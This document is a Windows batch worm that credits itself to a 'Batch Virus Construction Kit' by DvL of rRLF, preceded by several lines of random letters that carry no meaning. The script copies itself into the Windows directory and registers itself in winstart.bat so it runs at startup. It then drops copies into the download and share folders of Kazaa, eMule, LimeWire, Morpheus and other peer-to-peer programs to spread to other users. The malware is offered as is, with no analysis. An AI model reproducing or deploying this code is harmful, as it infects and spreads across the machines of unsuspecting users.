svlyaakpucogpheydafrzwurudfcvjuqpilnvbzwuiggmfyfoccqfsnqlpvlhohvwykjzheqqefrhntsorukglyvqobfriknxk
zpkbckumcoynrznmybzheuuxnmwxgfenweyoxspapyjnynyjfojojbjixgtpzlbbsdoeubnohwmtswdahzfntdsqwogstuyven
ecxzxwxidncooiujnmkogralhmusgpwjqqkaetbkgdgcpaksdsnvjdcytgeujdnswclstzlbuvjcqwsbzmgonvsbofbosgsout
epbirkpxpzdqmlzcsgbnmwpsqmsreziwselpllprcjmehwaudjkbdjuabetgnzjthajojesjztbfulzwqnadhpbkmdgrjpuqaq
fzervglrhnscwqjffpppgebxpvlwnvbnkrkyvrrrpyqymjnzmfskipyzelkunqohikvasxtfjegztiejetiaexhylhvlpirkky
byhewyzcegquowszbmsmfhuemusdplabssmvfhxkdtzbvamrpwvnynqwxyukmwponkfbxvnxtoskbkyrodliqgidvxrkkhngbb
kgccejrrtcnmmsqjlejyjtxsijqffwbqzqyqjqodalhvlplptjjeboujqqgdcedgumpylkbzjrnzicrvheulwhcxnmkpoaywtb
hnvnvgsdllmyzcxxthetnjwdieaddnusbzytoyacdtiaalpukglrsvpycjwikhurdvewwcdutmhakxedyvaxigpdxsnjjfsgro
yqluzoncttwmpgnphezrtaxtjasgjrvtqvxamqodcaagujgcthkebwgzvbbmthsxrhyuniaeupmfpuiusaftizcyiicytjnolt
eeaxbtegzkzuxhqdblnppfgomqgdkgjahexrvistdwvrdbxlqhnbygzovpexnmwvywawmmuxqparerztnhgpfrzbvwjzavhauf
::
:: Generated by Batch Virus Construction Kit 0.2 [DvL]-[rRLF]
:: Created by DvL [rRLF]
::
@echo off
@ver|find "XP"|if errorlevel 1 ctty nul|if not errorlevel 1 exit
break off
copy %0 %windir%\imnfilsj.bat>nul
echo.@call %windir%\imnfilsj.bat>%windir%\winstart.bat
copy %0 c:\kazaa\myshar~1\imnfilsj.bat>nul
copy %0 c:\mydown~1\imnfilsj.bat>nul
copy %0 c:\mydocu~1\imnfilsj.bat>nul
copy %0 c:\eigene~1\imnfilsj.bat>nul
copy %0 c:\progra~1\applej~1\incoming\imnfilsj.bat>nul
copy %0 c:\progra~1\bearsh~1\shared\imnfilsj.bat>nul
copy %0 c:\progra~1\edonke~1\incoming\imnfilsj.bat>nul
copy %0 c:\progra~1\emule\incoming\imnfilsj.bat>nul
copy %0 c:\progra~1\grokster\mygrok~1\imnfilsj.bat>nul
copy %0 c:\progra~1\icq\shared~1\imnfilsj.bat>nul
copy %0 c:\progra~1\kazaa\myshar~1\imnfilsj.bat>nul
copy %0 c:\progra~1\kazaal~1\myshar~1\imnfilsj.bat>nul
copy %0 c:\progra~1\kmd\myshar~1\imnfilsj.bat>nul
copy %0 c:\progra~1\limewire\shared\imnfilsj.bat>nul
copy %0 c:\progra~1\morpheus\myshar~1\imnfilsj.bat>nul
copy %0 c:\progra~1\overnet\bundles\imnfilsj.bat>nul
